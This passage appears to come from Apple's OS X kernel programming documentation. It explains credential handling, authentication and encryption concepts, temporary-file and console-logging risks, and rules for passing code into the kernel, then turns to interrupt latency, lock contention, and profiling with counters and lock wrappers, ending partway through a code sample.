One of the most important things to remember when working with credentials is that they are per process, not per context. This is important because a process may not be running as the console user. Two examples of this are processes started from an ssh session (since ssh runs in the startup context) and setuid programs (which run as a different user in the same login context).

It is crucial to be aware of these issues.
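As a rough user-space illustration of the setuid case, the sketch below compares a process's real and effective user IDs using the POSIX calls getuid(2) and geteuid(2). The helper names ids_differ and process_identity_changed are hypothetical, and this is not how kernel code inspects credentials; it only shows that the identity a process runs with can differ from the identity of the user who launched it.

```c
#include <stdbool.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: true when the effective user differs from the
 * real user, which is what happens inside a setuid program. */
static bool ids_differ(uid_t real_uid, uid_t effective_uid)
{
    return real_uid != effective_uid;
}

/* Apply the comparison to the calling process. */
static bool process_identity_changed(void)
{
    return ids_differ(getuid(), geteuid());
}
```

A caller that sees process_identity_changed() return true should not assume that the effective user is the person sitting at the console.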
If you are communicating with a setuid root GUI application in a user’s login context, and if you are executing another application or are reading sensitive data, you probably want to treat it as if it had the same authority as the console user, not the authority of the effective user ID caused by running setuid. This is particularly problematic when dealing with programs that run as setuid root if the console user is not in the admin group. Failure to perform reasonable checks can lead to major security holes down the road.

However, this is not a hard and fast rule. Sometimes it is not obvious whether to use the credentials of the running process or those of the console user. In such cases, it is often reasonable to have a helper application show a dialog box on the console to require interaction from the console user. If this is not possible, a good rule of thumb is to assume the lesser of the privileges of the current and console users, as it is almost always better to have kernel code occasionally fail to provide a needed service than to provide that service unintentionally to an unauthorized user or process.

It is generally easier to determine the console user from a user space application than from kernel space code. Thus, you should generally do such checks from user space. If that is not possible, however, the variable console_user (maintained by the VFS subsystem) will give you the uid of the last owner of /dev/console (maintained by a bit of code in the chown system call). This is certainly not an ideal solution, but it does provide the most likely identity of the console user. Since this is only a “best guess,” however, you should use this only if you cannot do appropriate checking in user space.

Basic User Credentials

Basic user credentials used in the kernel are stored in a variable of type struct ucred.
These are mostly used in specialized parts of the kernel, generally in places where the determining factor in permissions is whether or not the caller is running as the root user.

This structure has four fields:
● cr_ref: reference count (used internally)
● cr_uid: user ID
● cr_ngroups: number of groups in cr_groups
● cr_groups[NGROUPS]: list of groups to which the user belongs

This structure has an internal reference counter to prevent unintentionally freeing the memory associated with it while it is still in use. For this reason, you should not indiscriminately copy this object but should instead either use crdup to duplicate it or use crcopy to duplicate it and (potentially) free the original. You should be sure to crfree any copies you might make. You can also create a new, empty ucred structure with crget.

The prototypes for these functions follow:
● struct ucred *crdup(struct ucred *cr)
● struct ucred *crcopy(struct ucred *cr)
● struct ucred *crget(void)
● void crfree(struct ucred *cr)

Note: Functions for working with basic user credentials are not exported outside of the kernel, and thus are not generally available to kernel extensions.

Access Control Lists

Access control lists are a new feature in OS X v10.4. Access control lists are primarily used in the file system portion of the OS X kernel, and are supported through the use of the kauth API.

The kauth API is described in the header file /System/Library/Frameworks/Kernel.framework/Headers/sys/kauth.h. Because this API is still evolving, detailed documentation is not yet available.

Remote Authentication

This is one of the more difficult problems in computer security: the ability to identify someone connecting to a computer remotely. One of the most secure methods is the use of public key cryptography, which is described in more detail in “Key-based Authentication and Encryption” (page 32).
However, many other means of authentication are possible, with varying degrees of security.

Some other authentication schemes include:
● blind trust
● IP-only authentication
● password (shared secret) authentication
● combination of IP and password authentication
● one-time pads (challenge-response)
● time-based authentication

Most of these are obvious, and require no further explanation. However, one-time pads and time-based authentication may be unfamiliar to many people outside security circles, and are thus worth mentioning in more detail.

One-Time Pads

Based on the concept of “challenge-response” pairs, one-time pad (OTP) authentication requires that both parties have an identical list of pairs of numbers, words, symbols, or whatever, sorted by the first item. When trying to access a remote system, the remote system prompts the user with a challenge. The user finds the challenge in the first column, then sends back the matching response. Alternatively, this could be an automated exchange between two pieces of software.

For maximum security, no challenge should ever be issued twice. For this reason, and because these systems were initially implemented with a paper pad containing challenge-response, or CR pairs, such systems are often called one-time pads.

The one-time nature of OTP authentication makes it impossible for someone to guess the appropriate response to any one particular challenge by a brute force attack (by responding to that challenge repeatedly with different answers). Basically, the only way to break such a system, short of a lucky guess, is to actually know some portion of the contents of the list of pairs.

For this reason, one-time pads can be used over insecure communication channels. If someone snoops the communication, they can obtain that challenge-response pair.
However, that information is of no use to them, since that particular challenge will never be issued again. (It does not even reduce the potential sample space for responses, since only the challenges must be unique.)

Time-based Authentication

This is probably the least understood means of authentication, though it is commonly used by such technologies as SecurID. The concept is relatively straightforward. You begin with a mathematical function that takes a small number of parameters (two, for example) and returns a new parameter. A good example of such a function is the function that generates the set of Fibonacci numbers (possibly truncated after a certain number of bits, with arbitrary initial seed values).

Take this function, and add a third parameter, t, representing time in units of k seconds. Make the function be a generating function on t, with two seed values, a and b, where

f(x, y) = (x + y) MOD 2^32
g(t) = a, for 0 <= t < k
g(t) = b, for k <= t < 2k
g(t) = f(g(t - 2k), g(t - k)), for t >= 2k

In other words, every k seconds, you calculate a new value based on the previous two and some equation. Then discard the oldest value, replacing it with the second oldest value, and replace the second oldest value with the value that you just generated.

As long as both ends have the same notion of the current time and the original two numbers, they can then calculate the most recently generated number and use this as a shared secret. Of course, if you are writing code that does this, you should use a closed form of this equation, since calculating Fibonacci numbers recursively without additional storage grows at O(2^(t/k)), which is not practical when t is measured in years and k is a small constant measured in seconds.

The security of such a scheme depends on various properties of the generator function, and the details of such a function are beyond the scope of this document.
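As a rough illustration of the generator described above, the following C sketch computes g(t) by stepping through the k-second intervals that have elapsed since time zero, keeping only the two most recent values. The names f and g follow the text; the parameter types and the choice to iterate rather than use a closed form are assumptions made for brevity, so the loop still costs time proportional to t/k. It is a toy with none of the properties a real generator function needs.

```c
#include <stdint.h>

/* f(x, y) = (x + y) MOD 2^32: unsigned 32-bit addition wraps at 2^32. */
static uint32_t f(uint32_t x, uint32_t y)
{
    return (uint32_t)(x + y);
}

/*
 * Value shared by both ends at time t (in seconds), where a new value
 * is produced every k seconds (k must be nonzero) from seeds a and b.
 */
static uint32_t g(uint64_t t, uint64_t k, uint32_t a, uint32_t b)
{
    uint64_t n = t / k;              /* index of the current k-second interval */
    if (n == 0)
        return a;
    if (n == 1)
        return b;

    uint32_t older = a, newer = b;
    for (uint64_t i = 2; i <= n; i++) {
        uint32_t next = f(older, newer);
        older = newer;               /* discard the oldest value */
        newer = next;                /* keep the value just generated */
    }
    return newer;
}
```

Both ends would call g with the same seeds and their own clocks; if the clocks agree to within the same interval, the results match. A long-running implementation would more plausibly carry the two most recent values forward from one interval to the next instead of recomputing from time zero.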
For more information, you should obtain an introductory text on cryptography, such as Bruce Schneier’s Applied Cryptography.

Temporary Files

Temporary files are a major source of security headaches. If a program does not set permissions correctly and in the right order, this can provide a means for an attacker to arbitrarily modify or read these files. The security impact of such modifications depends on the contents of the files.

Temporary files are of much less concern to kernel programmers, since most kernel code does not use temporary files. Indeed, kernel code should generally not use files at all. However, many people programming in the kernel are doing so to facilitate the use of applications that may use temporary files. As such, this issue is worth noting.

The most common problem with temporary files is that it is often possible for a malicious third party to delete the temporary file and substitute a different one with relaxed permissions in its place. Depending on the contents of the file, this could range from being a minor inconvenience to being a relatively large security hole, particularly if the file contains a shell script that is about to be executed with the permissions of the program’s user.

/dev/mem and /dev/kmem

One particularly painful surprise to people doing security programming in most UNIX or UNIX-like environments is the existence of /dev/mem and /dev/kmem. These device files allow the root user to arbitrarily access the contents of physical memory and kernel memory, respectively. There is absolutely nothing you can do to prevent this. From a kernel perspective, root is omnipresent and omniscient. If this is a security concern for your program, then you should consider whether your program should be used on a system controlled by someone else and take the necessary precautions.

Note: Support for /dev/kmem is being phased out.
It is not available on Intel-based Macintosh computers in OS X v10.4. In the future, it will be removed entirely.

It is not possible to write device drivers that access PCI device memory through /dev/mem in OS X. If you need to support such a driver, you must write a kernel stub driver that matches against the device and maps its memory space into the address space of the user process. For more information, read about user clients in I/O Kit Fundamentals.

Key-based Authentication and Encryption

Key-based authentication and encryption are ostensibly some of the more secure means of authentication and encryption, and can exist in many forms. The most common forms are based upon a shared secret. The DES, 3DES (triple-DES), IDEA, twofish, and blowfish ciphers are examples of encryption schemes based on a shared secret. Passwords are an example of an authentication scheme based on a shared secret.

The idea behind most key-based encryption is that you have an encryption key of some arbitrary length that is used to encode the data, and that same key is used in the opposite manner (or in some cases, in the same manner) to decode the data.

The problem with shared secret security is that the initial key exchange must occur in a secure fashion. If the integrity of the key is compromised during transmission, the data integrity is lost. This is not a concern if the key can be generated ahead of time and placed at both transport endpoints in a secure fashion. However, in many cases, this is not possible or practical because the two endpoints (be they physical devices or system tasks) are controlled by different people or entities. Fortunately, an alternative exists, known as zero-knowledge proofs.
The concept of a zero-knowledge proof is that two seemingly arbitrary key values, k1 and k2, are created, and that these values are related by some mathematical function f in such a way that

f(f(a,k1),k2) = a

That is, applying a well-known function to the original cleartext using the first key results in ciphertext, and applying that same function to the ciphertext using the second key returns the original data. This is also reversible, meaning that

f(f(a,k2),k1) = a

If the function f is chosen correctly, it is extremely difficult to derive k1 from k2 and vice versa, which would mean that there is no function that can easily transform the ciphertext back into the cleartext based upon the key used to encode it.

An example of this is to choose the mathematical function to be

f(a,k) = ((a*k) MOD 256) + ((a*k)/256)

where a is a byte of cleartext, and k is some key 8 bits in length. This is an extraordinarily weak cipher, since the function f allows you to easily determine one key from the other, but it is illustrative of the basic concept.

Pick k1 to be 8 and k2 to be 32. So for a=73, (a * 8)=584. This takes two bytes, so add the bits in the high byte to the bits of the low byte, and you get 74. Repeat this process with 32. This gives you 2368. Again, add the bits from the high byte to the bits of the low byte, and you have 73 again.

This mathematical concept (with very different functions), when put to practical use, is known as public key (PK) cryptography, and forms the basis for RSA and DSA encryption.

Public Key Weaknesses

Public key encryption can be very powerful when used properly. However, it has a number of inherent weaknesses. A complete explanation of these weaknesses is beyond the scope of this document. However, it is important that you understand these weaknesses at a high level to avoid falling into some common traps.
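Before turning to those weaknesses, the arithmetic in the toy cipher described earlier in this section, f(a,k) = ((a*k) MOD 256) + ((a*k)/256), can be checked with a few lines of C. The function name toy_f and its types are assumptions made for this sketch; as the text says, this is an extraordinarily weak cipher, shown only to make the worked example with k1 = 8 and k2 = 32 concrete.

```c
/*
 * Toy cipher from the text: multiply the cleartext byte by the key,
 * then add the high byte of the product to the low byte.
 * Integer division by 256 extracts the high byte.
 */
static unsigned toy_f(unsigned a, unsigned k)
{
    unsigned product = a * k;
    return (product % 256u) + (product / 256u);
}
```

With these keys, toy_f(73, 8) yields 74 and toy_f(74, 32) yields 73 again, and applying the keys in the opposite order also returns 73. The keys undo each other because 8 * 32 = 256, which is congruent to 1 modulo 255, and folding the high byte into the low byte is a reduction modulo 255. That simple relationship is exactly what makes one key easy to derive from the other.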
Some commonly mentioned weaknesses of public key cryptography include:
● Trust model for key exchange
● Pattern sensitivity
● Short data weakness

Trust Models

The most commonly discussed weakness of public key cryptography is the initial key exchange process itself. If someone manages to intercept a key during the initial exchange, he or she could instead give you his or her own public key and intercept messages going to the intended party. This is known as a man-in-the-middle attack.

For such services as ssh, most people either manually copy the keys from one server to another or simply assume that the initial key exchange was successful. For most purposes, this is sufficient.

In particularly sensitive situations, however, this is not good enough. For this reason, there is a procedure known as key signing. There are two basic models for key signing: the central authority model and the web of trust model.

The central authority model is straightforward. A central certifying agency signs a given key, and says that they believe the owner of the key is who he or she claims to be. If you trust that authority, then by association, you trust keys that the authority claims are valid.

The web of trust model is somewhat different. Instead of a central authority, individuals sign keys belonging to other individuals. By signing someone’s key, you are saying that you trust that the person is really who he or she claims to be and that you believe that the key really belongs to him or her. The methods you use for determining that trust will ultimately impact whether others trust your signatures to be valid.

There are many different ways of determining trust, and thus many groups have their own rules for who should and should not sign someone else’s key.
Those rules are intended to make the trust level of a key depend on the trust level of the keys that have signed it.

The line between central authorities and web of trust models is not quite as clear-cut as you might think, however. Many central authorities are hierarchies of authorities, and in some cases, they are actually webs of trust among multiple authorities. Likewise, many webs of trust may include centralized repositories for keys. While those repositories don’t provide any certification of the keys, they do provide centralized access. Finally, centralized authorities can easily sign keys as part of a web of trust.

There are many websites that describe webs of trust and centralized certification schemes. A good general description of several such models can be found at http://world.std.com/~cme/html/web.html.

Sensitivity to Patterns and Short Messages

Existing public key encryption algorithms do a good job at encrypting semi-random data. They fall short when encrypting data with certain patterns, as these patterns can inadvertently reveal information about the keys. The particular patterns depend on the encryption scheme. Inadvertently hitting such a pattern does not allow you to determine the private key. However, it can reduce the search space needed to decode a given message.

Short data weakness is closely related to pattern sensitivity. If the information you are encrypting consists of a single number, for example the number 1, you basically get a value that is closely related mathematically to the public key. If the intent is to make sure that only someone with the private key can get the original value, you have a problem.

In other words, public key encryption schemes generally do not encrypt all patterns equally well. For this reason (and because public key cryptography tends to be slower than single key cryptography), public keys are almost never used to encrypt end-user data. Instead, they are used to encrypt a session key.
This session key is then used to encrypt the actual data using a shared secret mechanism such as 3DES, AES, blowfish, and so on.

Using Public Keys for Message Exchange

Public key cryptography can be used in many ways. When both keys are private, it can be used to send data back and forth. However, this use is no more useful than a shared secret mechanism. In fact, it is frequently weaker, for the reasons mentioned earlier in the chapter. Public key cryptography becomes powerful when one key is made public.

Assume that Ernie and Bert want to send coded messages. Ernie gives Bert his public key. Assuming that the key was not intercepted and replaced with someone else’s key, Bert can now send data to Ernie securely, because data encrypted with the public key can only be decrypted with the private key (which only Ernie has).

Bert uses this mechanism to send a shared secret. Bert and Ernie can now communicate with each other using a shared secret mechanism, confident in the knowledge that no third party has intercepted that secret. Alternately, Bert could give Ernie his public key, and they could both encrypt data using each other’s public keys, or more commonly by using those public keys to encrypt a session key and encrypting the data with that session key.

Using Public Keys for Identity Verification

Public key cryptography can also be used for verification of identity. Kyle wants to know if someone on the Internet who claims to be Stan is really Stan. A few months earlier, Stan handed Kyle his public key on a floppy disk. Thus, since Kyle already has Stan’s public key (and trusts the source of that key), he can now easily verify Stan’s identity.

To achieve this, Kyle sends a cleartext message and asks Stan to encrypt it. Stan encrypts it with his private key. Kyle then uses Stan’s public key to decode the ciphertext.
If the resulting cleartext matches, then the person on the other end must be Stan (unless someone else has Stan’s private key).

Using Public Keys for Data Integrity Checking

Finally, public key cryptography can be used for signing. Ahmed is in charge of meetings of a secret society called the Stupid Acronym Preventionists club. Abraham is a member of the club and gets a TIFF file containing a notice of their next meeting, passed on by way of a fellow member of the science club, Albert. Abraham is concerned, however, that the notice might have come from Bubba, who is trying to infiltrate the SAPs.

Ahmed, however, was one step ahead, and took a checksum of the original message and encrypted the checksum with his private key, and sent the encrypted checksum as an attachment. Abraham used Ahmed’s public key to decrypt the checksum, and found that the checksum did not match that of the actual document. He wisely avoided the meeting. Isaac, however, was tricked into revealing himself as a SAP because he didn’t remember to check the signature on the message.

The moral of this story? One should always beware of geeks sharing TIFFs. That is, if the security of some piece of data is important and if you do not have a direct, secure means of communication between two applications, computers, people, and so on, you must verify the authenticity of any communication using signatures, keys, or some other similar method. This may save your data and also save face.

Encryption Summary

Encryption is a powerful technique for keeping data secure if the initial key exchange occurs in a secure fashion. One means for this is to have a public key, stored in a well-known (and trusted) location. This allows for one-way encrypted communication through which a shared secret can be transferred for later two-way encrypted communication.
You can use encryption not only for protecting data, but also for verifying the authenticity of data by encrypting a checksum. You can also use it to verify the identity of a client by requiring that the client encrypt some random piece of data as proof that the client holds the appropriate encryption key.

Encryption, however, is not the final word in computer security. Because it depends on having some form of trusted key exchange, additional infrastructure is needed in order to achieve total security in environments where communication can be intercepted and modified.

Console Debugging

Warning: Failure to follow this advice can unintentionally expose security-critical information.

In traditional UNIX and UNIX-like systems, the console is owned by root. Only root sees console messages. For this reason, print statements in the kernel are relatively secure.

In OS X, any user can run the Console application. This represents a major departure from other UNIX-like systems. While it is never a good idea to include sensitive information in kernel debugging statements, it is particularly important not to do so in OS X. You must assume that any information displayed to the console could potentially be read by any user on the system (since the console is virtualized in the form of a user-viewable window).

Printing any information involving sensitive data, including its location on disk or in memory, represents a security hole, however slight, and you should write your code accordingly. Obviously this is of less concern if that information is only printed when the user sets a debugging flag somewhere, but for normal use, printing potentially private information to the console is strongly discouraged.
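One way to follow this advice is to keep sensitive details out of the default message and include them only when a debugging flag has been set deliberately. The sketch below is a user-space illustration under that assumption; the flag debug_sensitive, the function format_key_event, and the message wording are all hypothetical and do not correspond to any OS X interface.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical debugging flag; off in normal use. */
static int debug_sensitive = 0;

/*
 * Build the console message for a "key cached" event. The volume name
 * and on-disk offset are treated as sensitive and appear only when the
 * debugging flag is set.
 */
static int format_key_event(char *out, size_t outlen,
                            const char *volume, size_t offset)
{
    if (out == NULL || outlen == 0 || volume == NULL)
        return -1;
    if (debug_sensitive)
        return snprintf(out, outlen, "key cached for %s at offset %zu",
                        volume, offset);
    return snprintf(out, outlen, "key cached");
}
```

With the flag clear, a reader of the console learns only that the event happened, not where the key lives.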
You must also be careful not to inadvertently print information that you use for generating password hashes or encryption keys, such as seed values passed to a random number generator.

This is, by necessity, not a complete list of information to avoid printing to the console. You must use your own judgement when deciding whether a piece of information could be valuable if seen by a third party, and then decide if it is appropriate to print it to the console.

Code Passing

There are many ways of passing executable code into the kernel from user space. For the purposes of this section, executable code is not limited to compiled object code. It includes any instructions passed into the kernel that significantly affect control flow. Examples of passed-in executable code range from simple rules such as the filtering code uploaded in many firewall designs to bytecode uploads for a SCSI card.

If it is possible to execute your code in user space, you should not even contemplate pushing code into the kernel. For the rare occasion where no other reasonable solution exists, however, you may need to pass some form of executable code into the kernel. This section explains some of the security ramifications of pushing code into the kernel and the level of verification needed to ensure consistent operation.

Here are some guidelines to minimize the potential for security holes:

1. No raw object code.
Direct execution of code passed in from user space is very dangerous. Interpreted languages are the only reasonable solution for this sort of problem, and even this is fraught with difficulty. Traditional machine code can’t be checked sufficiently to ensure security compliance.

2. Bounds checking.
Since you are in the kernel, you are responsible for making sure that any uploaded code does not randomly access memory and does not attempt to do direct hardware access.
You would normally make this a feature of the language itself, restricting access to the data element on which the bytecode is operating.

3. Termination checking.
With very, very few exceptions, the language chosen should be limited to code that can be verified to terminate, and you should verify accordingly. If your driver is stuck in a tightly rolled loop, it is probably unable to do its job, and may impact overall system performance in the process. A language that does not allow (unbounded) loops (for example, allowing for but not while or goto) could be one way to ensure termination.

4. Validity checking.
Your bytecode interpreter would be responsible for checking ahead for any potentially invalid operations and taking appropriate punitive actions against the uploaded code. For example, if uploaded code is allowed to do math, then proper protection must be in place to handle divide by zero errors.

5. Sanity checking.
You should verify that the output is something remotely reasonable, if possible. It is not always possible to verify that the output is correct, but it is generally possible to create rules that prevent egregiously invalid output. For example, a network filter rule should output something resembling packets. If the checksums are bad, or if other information is missing or corrupt, clearly the uploaded code is faulty, and appropriate actions should be taken. It would be highly inappropriate for OS X to send out bad network traffic.

In general, the more restrictive the language set, the lower the security risk. For example, interpreting simple network routing policies is less likely to be a security problem than interpreting packet rewriting rules, which is less likely to be an issue than running Java bytecode in the kernel.
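To make guidelines 2 through 5 concrete, here is a minimal sketch of a deliberately restrictive interpreter, written as ordinary user-space C. Everything in it is hypothetical and invented for illustration: the opcode set, struct insn, VM_MAX_INSNS, vm_verify, and vm_run. Programs can read only the data array they are handed, can only skip forward (so execution takes at most one step per instruction), are checked for division by zero, and must produce a result that fits the expected range.

```c
#include <stddef.h>
#include <stdint.h>

#define VM_MAX_INSNS 64   /* hypothetical cap on program length */

enum vm_op { OP_LOAD, OP_ADD, OP_DIV, OP_SKIP_IF_ZERO, OP_END };
enum vm_status { VM_OK, VM_BAD_PROGRAM, VM_DIV_BY_ZERO, VM_BAD_OUTPUT };

struct insn { uint8_t op; uint8_t arg; };

/* Check the whole program before running any of it. */
static enum vm_status vm_verify(const struct insn *prog, size_t n, size_t data_len)
{
    if (prog == NULL || n == 0 || n > VM_MAX_INSNS || prog[n - 1].op != OP_END)
        return VM_BAD_PROGRAM;
    for (size_t pc = 0; pc < n; pc++) {
        switch (prog[pc].op) {
        case OP_LOAD:
        case OP_ADD:
        case OP_DIV:
            if (prog[pc].arg >= data_len)        /* bounds: data array only */
                return VM_BAD_PROGRAM;
            break;
        case OP_SKIP_IF_ZERO:
            if (pc + 1 + prog[pc].arg >= n)      /* forward skips inside the program */
                return VM_BAD_PROGRAM;
            break;
        case OP_END:
            break;
        default:                                 /* unknown opcode */
            return VM_BAD_PROGRAM;
        }
    }
    return VM_OK;
}

static enum vm_status vm_run(const struct insn *prog, size_t n,
                             const int32_t *data, size_t data_len,
                             int32_t *result)
{
    if (result == NULL || (data == NULL && data_len != 0))
        return VM_BAD_PROGRAM;
    enum vm_status status = vm_verify(prog, n, data_len);
    if (status != VM_OK)
        return status;

    int64_t acc = 0;                             /* wide enough for VM_MAX_INSNS adds */
    for (size_t pc = 0; pc < n; pc++) {          /* pc only increases: at most n steps */
        const struct insn *in = &prog[pc];
        switch (in->op) {
        case OP_LOAD: acc = data[in->arg]; break;
        case OP_ADD:  acc += data[in->arg]; break;
        case OP_DIV:
            if (data[in->arg] == 0)              /* validity: no divide by zero */
                return VM_DIV_BY_ZERO;
            acc /= data[in->arg];
            break;
        case OP_SKIP_IF_ZERO:
            if (acc == 0)
                pc += in->arg;
            break;
        case OP_END:
            if (acc < INT32_MIN || acc > INT32_MAX)  /* sanity check on the output */
                return VM_BAD_OUTPUT;
            *result = (int32_t)acc;
            return VM_OK;
        default:
            return VM_BAD_PROGRAM;
        }
    }
    return VM_BAD_PROGRAM;                       /* not reached for verified programs */
}
```

The design choice that matters most here is what the language leaves out: with no backward jumps and no addressing outside the supplied array, termination and memory safety follow from the verification pass rather than from trusting the uploaded program.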
As with anything else, you must carefully weigh the potential benefits against the potential drawbacks and make the best decision given the information available.

Performance Considerations

Performance is a key aspect of any software system. Nowhere is this more true than in the kernel, where small performance problems tend to be magnified by repeated execution. For this reason, it is extremely important that your code be as efficient as possible.

This chapter discusses the importance of low interrupt latency and fine-grained locking and tells you how to determine what portions of your code would benefit most from more efficient design.

Interrupt Latency

In OS X, you will probably never need to write code that runs in an interrupt context. In general, only motherboard hardware requires this. However, in the unlikely event that you do need to write code in an interrupt context, interrupt latency should be a primary concern.

Interrupt latency refers to the delay between an interrupt being generated and an interrupt handler actually beginning to service that interrupt. In practice, the worst case interrupt latency is closely tied to the amount of time spent in supervisor mode (also called kernel mode) with interrupts off while handling some other interrupt. Low interrupt latency is necessary for reasonable overall performance, particularly when working with audio and video. In order to have reasonable soft real-time performance (for example, performance of multimedia applications), the interrupt latency caused by every device driver must be both small and bounded.

OS X takes great care to bound and minimize interrupt latency for built-in drivers. It does this primarily through the use of interrupt service threads (also known as I/O service threads).

When OS X takes an interrupt, the low-level trap handlers call up to a generic interrupt handling routine that clears the pending interrupt bit in the interrupt controller and calls a device-specific interrupt handler. That device-specific handler, in turn, sends a message to an interrupt service thread to notify it that an interrupt has occurred, and then the handler returns. When no further interrupts are pending, control returns to the currently executing thread.

The next time the interrupt service thread is scheduled, it checks to see if an interrupt has occurred, then services the interrupt. As the name suggests, this actually is happening in a thread context, not an interrupt context. This design causes two major differences from traditional operating system design:
● Interrupt latency is near zero, since the code executing in an interrupt context is very small.
● It is possible for an interrupt to occur while a device driver is executing. This means that traditional (threaded) device drivers can be preempted and must use locking or other similar methods to protect any shared data (although they need to do so anyway to work on computers with multiple processors).

This model is crucial to the performance of OS X. You should not attempt to circumvent this design by doing large amounts of work in an interrupt context. Doing so will be detrimental to the overall performance of the system.

Locking Bottlenecks

It is difficult to communicate data between multiple threads or between thread and interrupt contexts without using locking or other synchronization. This locking protects your data from getting clobbered by another thread. However, it also has the unfortunate side effect of being a potential bottleneck.

In some types of communication (particularly n-way), locking can dramatically hinder performance by allowing only one thing to happen at a time.
Read-write locks, discussed in “Synchronization Primitives” (page 128), can help alleviate this problem in the most common situation where multiple clients need to be able to read information but only rarely need to modify that data. However, there are many cases where read-write locks are not helpful. This section discusses some possible problems and ways of improving performance within those constraints.

Working With Highly Contended Locks

When many threads need to obtain a lock (or a small number of threads need to obtain a lock frequently), this lock is considered highly contended. Highly contended locks frequently represent faulty code design, but they are sometimes unavoidable. In those cases, the lock tends to become a major performance bottleneck.

Take, for example, the issue of many-to-many communication that must be synchronized through a common buffer. While some improvement can be gained by using read-write locks instead of an ordinary mutex, the issue of multiple writers means that read-write locks still perform badly.

One possible solution for this many-to-many communication problem is to break the lock up into multiple locks. Instead of sharing a single buffer for the communication itself, make a shared buffer that contains accounting information for the communication (for example, a list of buffers available for reading). Then assign each individual buffer its own lock. The readers might then need to check several locations to find the right data, but this still frequently yields better performance, since writers must only contend for a write lock while modifying the accounting information.

Another solution for many-to-many communications is to eliminate the buffer entirely and communicate using message passing, sockets, IPC, RPC, or other methods.

Yet another solution is to restructure your code in a way that the locking is unnecessary.
This is often much more difficult. One method that is often helpful is to take advantage of flags and atomic increments, as outlined in the next paragraph. For simplicity, a single-writer, single-reader example is presented, but it is possible to extend this idea to more complicated designs.

Take a buffer with some number of slots. Keep a read index and a write index into that buffer. When the write index and read index are the same, there is no data in the buffer. When writing, clear the next location. Then do an atomic increment on the write index. Write the data. End by setting a flag at that new location that says that the data is valid.

Note that this solution becomes much more difficult when dealing with multiple readers and multiple writers, and as such, is beyond the scope of this section.

Reducing Contention by Decreasing Granularity

One of the fundamental properties of locks is granularity. The granularity of a lock refers to the amount of code or data that it protects. A lock that protects a large block of code or a large amount of data is referred to as a coarse-grained lock, while a lock that protects only a small amount of code or data is referred to as a fine-grained lock. A coarse-grained lock is much more likely to be contended (needed by one thread while being held by another) than a more finely grained lock.

There are two basic ways of decreasing granularity. The first is to minimize the amount of code executed while a lock is held. For example, if you have code that calculates a value and stores it into a table, don’t take the lock before calling the function and release it after the function returns. Instead, take the lock in that piece of code right before you write the data, and release it as soon as you no longer need it.
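The advice above can be sketched in user space. The following is a minimal illustration only, assuming POSIX threads as a stand-in for kernel mutexes; the names table_lock, compute_value, store_computed, and read_slot are hypothetical and do not come from any kernel interface. The calculation runs with no lock held, and the lock covers only the store into the table.

```c
#include <pthread.h>

#define TABLE_SIZE 16

/* Hypothetical shared table and the single lock that protects it. */
static pthread_mutex_t table_lock = PTHREAD_MUTEX_INITIALIZER;
static long table[TABLE_SIZE];

/* Hypothetical calculation. It touches no shared state, so it can run
 * without holding the lock. Returns the sum of squares 1..input. */
long compute_value(int input)
{
    long acc = 0;
    for (int i = 1; i <= input; i++)
        acc += (long)i * i;
    return acc;
}

/* Compute first, then hold the lock only for the store itself. */
void store_computed(int slot, int input)
{
    long value = compute_value(input);  /* no lock held here */

    pthread_mutex_lock(&table_lock);
    table[slot] = value;                /* the only protected step */
    pthread_mutex_unlock(&table_lock);
}

/* Read one slot under the same lock. */
long read_slot(int slot)
{
    pthread_mutex_lock(&table_lock);
    long v = table[slot];
    pthread_mutex_unlock(&table_lock);
    return v;
}
```

A caller would use store_computed(3, 4) followed by read_slot(3). The design choice is that the time spent in compute_value no longer counts toward the lock hold time, so other threads wait only for the duration of a single assignment.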
Of course, reducing the amount of protected code is not always possible or practical if the code needs to guarantee consistency where the value it is writing depends on other values in the table, since those values could change before you obtain the lock, requiring you to go back and redo the work.

It is also possible to reduce granularity by locking the data in smaller units. In the above example, you could have a lock on each cell of the table. When updating cells in the table, you would start by determining the cells on which the destination cell depends, then lock those cells and the destination cell in some fixed order. (To avoid deadlock, you must always either lock cells in the same order or use an appropriate try function and release all locks on failure.)

Once you have locked all the cells involved, you can then perform your calculation and release the locks, confident that no other thread has corrupted your calculations. However, by locking on a smaller unit of data, you have also reduced the likelihood of two threads needing to access the same cell.

A slightly more radical version of this is to use read-write locks on a per-cell basis and always upgrade in a particular order. This is, however, rather extreme, and difficult to do correctly.

Code Profiling

Code profiling means determining how often certain pieces of code are executed. By knowing how frequently a piece of code is used, you can more accurately gauge the importance of optimizing that piece of code. There are a number of good tools for profiling user space applications. However, code profiling in the kernel is a very different beast, since it isn’t reasonable to attach to it like you would a running process. (It is possible by using a second computer, but even then, it is not a trivial task.)
This section describes two useful ways of profiling your kernel code: counters and lock profiling. Any changes you make to allow code profiling should be done only during development. These are not the sort of changes that you want to release to end users.

Using Counters for Code Profiling

The first method of code profiling is with counters. To profile a section of code with a counter, you must first create a global variable whose name describes that piece of code and initialize it to zero. You then add something like

    #ifdef PROFILING
    foo_counter++;
    #endif

in the appropriate piece of code. If you then define PROFILING, that counter is created and initialized to zero, then incremented each time the code in question is executed.

One small snag with this sort of profiling is the problem of obtaining the data. This can be done in several ways. The simplest is probably to install a sysctl, using the address of foo_counter as an argument. Then, you could simply issue the sysctl command from the command line and read or clear the variable. Adding a sysctl is described in more detail in “BSD sysctl API” (page 117).

In addition to using sysctl, you could also obtain the data by printing its value when unloading the module (in the case of a KEXT) or by using a remote debugger to attach to the kernel and directly inspecting the variable. However, a sysctl provides the most flexibility. With a sysctl, you can sample the value at any time, not just when the module is unloaded. The ability to arbitrarily sample the value makes it easier to determine the importance of a piece of code to one particular action.

If you are developing code for use in the I/O Kit, you should probably use your driver’s setProperties call instead of a sysctl.

Lock Profiling

Lock profiling is another useful way to find the cause of code inefficiency.
Lock profiling can give you the following information:

● how many times a lock was taken
● how long the lock was held on average
● how often the lock was unavailable

Put another way, this allows you to determine the contention of a lock, and in so doing, can help you to minimize contention by code restructuring.

There are many different ways to do lock profiling. The most common way is to create your own lock calls that increment a counter and then call the real locking functions. When you move from debugging into a testing cycle before release, you can then replace the functions with defines to cause the actual functions to be called directly. For example, you might write something like this:

    extern struct timeval time;

    boolean_t mymutex_try(mymutex_t *lock) {
        int ret;
        ret = mutex_try(lock->mutex);
        if (!ret) {
            /* mutex_try returns FALSE when the lock is unavailable */
            lock->tryfailcount++;
        }
        return ret;
    }

    void mymutex_lock(mymutex_t *lock) {
        if (!(mymutex_try(lock))) {
            mutex_lock(lock->mutex);
        }
        lock->starttime = time.tv_sec;
    }

